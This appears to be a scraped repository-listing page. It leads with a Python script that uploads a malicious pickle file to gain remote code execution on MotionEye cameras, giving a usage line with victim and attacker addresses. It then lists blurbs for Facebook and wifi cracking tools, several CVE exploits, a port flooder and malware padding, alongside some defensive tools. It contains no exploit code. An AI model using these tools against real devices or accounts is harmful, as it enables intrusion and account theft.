A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye

Last update: Apr 18, 2022

Overview

MotionEye/MotionEyeOS Authenticated RCE

A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye. You need administrator credentials, so it should not be that big of a deal. Unfortunately, MotionEye/MotionEye tend to be ran with default credentials.

Example:

main.py --victim 192.168.1.2 --attacker 192.168.1.3:4444

Where victim and attacker are in the form of ip:port, unless it is port 80. Then, the port can be excluded. This uses the default username of admin with a blank password. There are also CLI options for alternate usernames/passwords. Please see the code for more details.

See https://www.pizzapower.me/2021/10/09/self-hosted-security-part-1-motioneye for a writeup on this and other issues.

Owner

Matt

I have no idea what I'm doing.

GitHub Repository

D-810 is an IDA Pro plugin which can be used to deobfuscate code at decompilation time by modifying IDA Pro microcode.

Introduction fork from https://gitlab.com/eshard/d810 What is D-810 D-810 is an IDA Pro plugin which can be used to deobfuscate code at decompilation

30 Dec 06, 2022

Scanner for Intranet

cthun3是集成端口扫描,服务识别,netbios扫描,网站识别,暴力破解和漏洞扫描的工具. cthun(克苏恩)是魔兽世界电子游戏中一位上古之神截图 cthun3结合viper使用时截图使用方法端口扫描 -ps-ip 端口扫描的ip地址范围,例如可以输入 -ps-ip 192.168.14

18 Sep 03, 2022

Facebook account cloning/hacking advanced tool + dictionary attack added | Facebook automation tool

loggef Facebook automation tool, Facebook account hacking and cloning advanced tool + dictionary attack added Warning Use this tool for educational pu

149 Aug 10, 2022

Obfuscate your python code into a string of integers. De-obfuscate also supported.

int-obfuscator Obfuscate your python code into a string of integers. De-obfuscate also supported. How it works: Each printable character gets replaced

6 Nov 13, 2022

Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.

sshuttle: where transparent proxy meets VPN meets ssh As far as I know, sshuttle is the only program that solves the following common case: Your clien

9.4k Jan 04, 2023

OpenSource Poc && Vulnerable-Target Storage Box.

reapoc OpenSource Poc && Vulnerable-Target Storage Box. We are aming to collect different normalized poc and the vulerable target to verify it. Now re

560 Dec 23, 2022

Tools ini digunakan untuk krekk pacebuk:v

E-Crack By Aang-XD Fitur Login • Login via token facebook • Login via cookie facebook Install On Termux $ pkg update && pkg upgrade $ pkg install pyth

2 Dec 24, 2021

A tool to crack a wifi password with a help of wordlist

A tool to crack a wifi password with a help of wordlist. This may take long to crack a wifi depending upon number of passwords your wordlist contains. Also it is slower as compared to social media ac

144 Dec 29, 2022

Exploiting CVE-2021-42278 and CVE-2021-42287

noPac Exploiting CVE-2021-42278 and CVE-2021-42287 原项目noPac在实现上可能有点问题，导致在本地没有打通，于是参考sam-the-admin项目进行修改。使用 pip3 install -r requirements.txt # GetShel

2 Jun 23, 2022

Make files with as many random bytes as you want

Lots o' Bytes 🔣 Make files with as many random bytes as you want! Use case Can be used to package malware that is normally small by making the downlo

1 Jan 13, 2022

Spring-0day/CVE-2022-22965

CVE-2022-22965 Spring Framework/CVE-2022-22965 Vulnerability ID: CVE-2022-22965/CNVD-2022-23942/QVD-2022-1691 Reproduce the vulnerability docker pull

4 Apr 05, 2022

SSH Tool For OSINT and then Cracking.

sshmap SSH Tool For OSINT and then Cracking. Linux Systems Only Usage: Scanner Syntax: scanner start/stop/status - Sarts/stops/sho

5 Apr 04, 2022

Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading

log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script

1 Dec 15, 2021

OpenPort scanner GUI tool (CNMAP)

CNMAP-GUI- OpenPort scanner GUI tool (CNMAP) as you know it is the advanced tool to find open port, firewalls and we also added here heartbleed scanni

9 Mar 05, 2022

version de mi tool de kali linux para miertuxzzzz digo, termux >:)

Msf-Tool 1.0 Termux apt install git -y apt install python apt install python3 apt install python3-pip apt install metasploit ---- ---- git clone ht

1 Feb 20, 2022

A Python Tool that uses Shodan API's to perform quick recon for vulnerabilities

Shodan Quick Recon A Python Tool that uses Shodan API's to perform quick recon for vulnerabilities Configuration You must edit the python code, and in

5 Aug 09, 2022

Malware Configuration And Payload Extraction

CAPE: Malware Configuration And Payload Extraction CAPE is a malware sandbox. It is derived from Cuckoo and is designed to automate the process of mal

1k Dec 30, 2022

A way to analyse how malware and/or goodware samples vary from each other using Shannon Entropy, Hausdorff Distance and Jaro-Winkler Distance

11 Nov 15, 2022

A scanner and a proof of sample exploit for log4j RCE CVE-2021-44228

1.Create a Sample Vulnerable Application . 2.Start a netcat listner . 3.Run the exploit . 5.Use jdk1.8.0_20 for better results . Exploit-db - https://

7 Aug 06, 2022

This is a simple Port Flooder written in Python 3.

This is a simple Port Flooder written in Python 3. Use this tool to quickly stress test your network devices and measure your router's or server's load.

4 Feb 20, 2022